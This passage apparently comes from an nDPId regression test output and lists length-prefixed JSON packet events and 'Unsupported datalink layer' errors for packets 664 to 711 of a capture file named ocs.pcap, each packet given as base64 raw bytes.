-00349{"packet_event_id":1,"packet_event_name":"packet","packet_id":664,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMMDQABABn\/SwKi0ArL40DbC2QBQ64tGkd7x6GPQEC\/q5A0AAAEBCAoANZLXRwYlGQEBBRLe8fin3vIDf97x7c\/e8fM7"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":665,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828187} -00349{"packet_event_id":1,"packet_event_name":"packet","packet_id":665,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMMEQABABn\/RwKi0ArL40DbC2QBQ64tGkd7x6GPQEC\/q3qEAAAEBCAoANZLXRwYlGQEBBRLe8fin3vII697x7c\/e8fM7"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":666,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828208} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":666,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMMFQABABn\/YwKi0ArL40DbC2QBQ64tGkd7x8zuwEC+\/ktcAAAEBCAoANZLZRwYlNAEBBQre8fin3vII6w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":667,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828215} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":667,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMGQABABn\/jwKi0ArL40DbC2QBQ64tGkd7yCOuAEC+scscAAAEBCAoANZLaRwYlNQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":668,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828217} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":668,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMHQABABn\/iwKi0ArL40DbC2QBQ64tGkd7yDleAEC+XbXAAAAEBCAoANZLaRwYlNQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":669,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828235} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":669,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMIQABABn\/hwKi0ArL40DbC2QBQ64tGkd7yE8OAEC\/qZ6oAAAEBCAoANZLcRwYlOg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":670,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828243} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":670,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMJQABABn\/gwKi0ArL40DbC2QBQ64tGkd7yGS+AEC\/WYlAAAAEBCAoANZLcRwYlPA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":671,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828244} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":671,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMKQABABn\/fwKi0ArL40DbC2QBQ64tGkd7yHpuAEC\/BXPgAAAEBCAoANZLdRwYlPA=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":672,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828249} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":672,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMLQABABn\/ewKi0ArL40DbC2QBQ64tGkd7yJAeAEC\/qV2MAAAEBCAoANZLdRwYlPA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":673,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828315} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":673,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMMMQABABn\/RwKi0ArL40DbC2QBQ64tGkd7yJAewEC\/q9VwAAAEBCAoANZLkRwYlPAEBBQre8jRL3vI5tw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":674,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828370} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":674,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMMNQABABn\/QwKi0ArL40DbC2QBQ64tGkd7yKXOwEC\/q79IAAAEBCAoANZLpRwYlVQEBBQre8jRL3vI5tw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":675,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828436} 
-00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":675,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMMOQABABn\/PwKi0ArL40DbC2QBQ64tGkd7yKXOwEC\/q6l8AAAEBCAoANZLwRwYlVQEBBQre8jRL3vI\/Iw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":676,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828815} -00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":676,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMMPQABABn\/OwKi0ArL40DbC2QBQ64tGkd7yLt+wEC\/W5IMAAAEBCAoANZMWRwYlswEBBQre8jRL3vI\/Iw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":677,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828881} -00350{"packet_event_id":1,"packet_event_name":"packet","packet_id":677,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMMQQABABn\/FwKi0ArL40DbC2QBQ64tGkd7yLt\/QEC\/Wd\/0AAAEBCAoANZMcRwYlswEBBRLe8kSP3vJJ+97yNEve8j8j"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":678,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828882} -00349{"packet_event_id":1,"packet_event_name":"packet","packet_id":678,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMMRQABABn\/EwKi0ArL40DbC2QBQ64tGkd7yLt\/QEC\/WcpEAAAEBCAoANZMcRwYlswEBBRLe8kSP3vJPZ97yNEve8j8j"} -00171{"error_event_id":3,"error_event_name":"Unsupported 
datalink layer","datalink":12,"packet_id":679,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828940} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":679,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMMSQABABn\/LwKi0ArL40DbC2QBQ64tGkd7yPyOwEC+ss6YAAAEBCAoANZMiRwYl4gEBBQre8kSP3vJPZw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":680,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828941} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":680,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMTQABABn\/WwKi0ArL40DbC2QBQ64tGkd7yT2eAEC+XK2sAAAEBCAoANZMiRwYl4g=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":681,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828942} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":681,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMMUQABABn\/JwKi0ArL40DbC2QBQ64tGkd7yT2ewEC\/qnbgAAAEBCAoANZMiRwYl4gEBBQre8kn73vJPZw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":682,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828944} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":682,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMVQABABn\/UwKi0ArL40DbC2QBQ64tGkd7yVNOAEC\/WJcAAAAEBCAoANZMiRwYl4g=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":683,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828993} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":683,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMWQABABn\/TwKi0ArL40DbC2QBQ64tGkd7yWj+AEC\/qICwAAAEBCAoANZMnRwYl8Q=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":684,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828994} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":684,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMXQABABn\/SwKi0ArL40DbC2QBQ64tGkd7yX6uAEC\/qGr8AAAEBCAoANZMoRwYl8Q=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":685,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828995} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":685,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMYQABABn\/RwKi0ArL40DbC2QBQ64tGkd7yZReAEC\/WFWcAAAEBCAoANZMoRwYl8Q=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":686,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828997} 
-00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":686,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMZQABABn\/QwKi0ArL40DbC2QBQ64tGkd7yaoOAEC\/BEBAAAAEBCAoANZMoRwYl8Q=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":687,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829055} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":687,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMaQABABn\/PwKi0ArL40DbC2QBQ64tGkd7yb++AEC\/qCmYAAAEBCAoANZMuRwYmAA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":688,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829056} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":688,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMbQABABn\/OwKi0ArL40DbC2QBQ64tGkd7ydVuAEC\/qBPoAAAEBCAoANZMuRwYmAA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":689,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829060} -00325{"packet_event_id":1,"packet_event_name":"packet","packet_id":689,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMcQABABn\/NwKi0ArL40DbC2QBQ64tGkd7yeseAEC\/q\/4sAAAEBCAoANZMuRwYmAg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":690,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829062} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":690,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMdQABABn\/MwKi0ArL40DbC2QBQ64tGkd7ygDOAEC\/W+jMAAAEBCAoANZMuRwYmAg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":691,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829106} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":691,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMeQABABn\/LwKi0ArL40DbC2QBQ64tGkd7yhZ+AEC\/q9J8AAAEBCAoANZMzRwYmEQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":692,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829107} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":692,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMfQABABn\/KwKi0ArL40DbC2QBQ64tGkd7yiwuAEC\/q7zMAAAEBCAoANZMzRwYmEQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":693,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829109} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":693,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMgQABABn\/JwKi0ArL40DbC2QBQ64tGkd7ykHeAEC\/W6dsAAAEBCAoANZMzRwYmEQ=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":694,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829111} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":694,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMhQABABn\/IwKi0ArL40DbC2QBQ64tGkd7yleOAEC\/B5IQAAAEBCAoANZMzRwYmEQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":695,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829207} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":695,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMiQABABn\/HwKi0ArL40DbC2QBQ64tGkd7ym0+AEC\/q3tgAAAEBCAoANZM9RwYmHg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":696,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829207} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":696,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMMjQABABn+6wKi0ArL40DbC2QBQ64tGkd7ym0+wEC\/qo\/gAAAEBCAoANZM9RwYmHgEBBQre8qC73vKmJw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":697,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829210} 
-00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":697,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMMkQABABn+5wKi0ArL40DbC2QBQ64tGkd7ym0+wEC\/qnowAAAEBCAoANZM9RwYmHgEBBQre8qC73vKrkw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":698,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829236} -00349{"packet_event_id":1,"packet_event_name":"packet","packet_id":698,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMMlQABABn+wwKi0ArL40DbC2QBQ64tGkd7ym0\/QEC\/qWSgAAAEBCAoANZNARwYmHgEBBRLe8rD\/3vK2a97yoLve8quT"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":699,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829238} -00349{"packet_event_id":1,"packet_event_name":"packet","packet_id":699,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMMmQABABn+vwKi0ArL40DbC2QBQ64tGkd7ym0\/QEC\/qU7wAAAEBCAoANZNARwYmHgEBBRLe8rD\/3vK7197yoLve8quT"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":700,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829241} -00349{"packet_event_id":1,"packet_event_name":"packet","packet_id":700,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMMnQABABn+uwKi0ArL40DbC2QBQ64tGkd7ym0\/QEC\/qTlAAAAEBCAoANZNARwYmHgEBBRLe8rD\/3vLBQ97yoLve8quT"} -00171{"error_event_id":3,"error_event_name":"Unsupported 
datalink layer","datalink":12,"packet_id":701,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829267} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":701,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMMoQABABn+1wKi0ArL40DbC2QBQ64tGkd7yq5OwEC+paHEAAAEBCAoANZNDRwYmPAEBBQre8rD\/3vLBQw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":702,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829319} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":702,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMpQABABn\/AwKi0ArL40DbC2QBQ64tGkd7ywUOAEC\/BuOMAAAEBCAoANZNIRwYmPQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":703,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829320} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":703,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMqQABABn+\/wKi0ArL40DbC2QBQ64tGkd7yxq+AEC\/qs04AAAEBCAoANZNIRwYmPQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":704,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829326} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":704,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMrQABABn++wKi0ArL40DbC2QBQ64tGkd7yzBuAEC\/WrfAAAAEBCAoANZNJRwYmQg=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":705,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829415} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":705,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMsQABABn+9wKi0ArL40DbC2QBQ64tGkd7y0YeAEC\/qqF0AAAEBCAoANZNPRwYmTw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":706,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829421} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":706,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMtQABABn+8wKi0ArL40DbC2QBQ64tGkd7y1vOAEC\/qou8AAAEBCAoANZNPRwYmUQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":707,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829423} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":707,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMuQABABn+7wKi0ArL40DbC2QBQ64tGkd7y3F+AEC\/qnYIAAAEBCAoANZNQRwYmUQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":708,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829438} 
-00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":708,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMvQABABn+6wKi0ArL40DbC2QBQ64tGkd7y4cuAEC\/qmBQAAAEBCAoANZNQRwYmUw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":709,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829487} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":709,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMwQABABn+5wKi0ArL40DbC2QBQ64tGkd7y5zeAEC\/qkokAAAEBCAoANZNYRwYmag=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":710,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829487} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":710,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMxQABABn+4wKi0ArL40DbC2QBQ64tGkd7y7KOAEC\/qjRwAAAEBCAoANZNZRwYmag=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":711,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829488} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":711,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMyQABABn+3wKi0ArL40DbC2QBQ64tGkd7y8g+AEC\/qh7AAAAEBCAoANZNZRwYmag=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
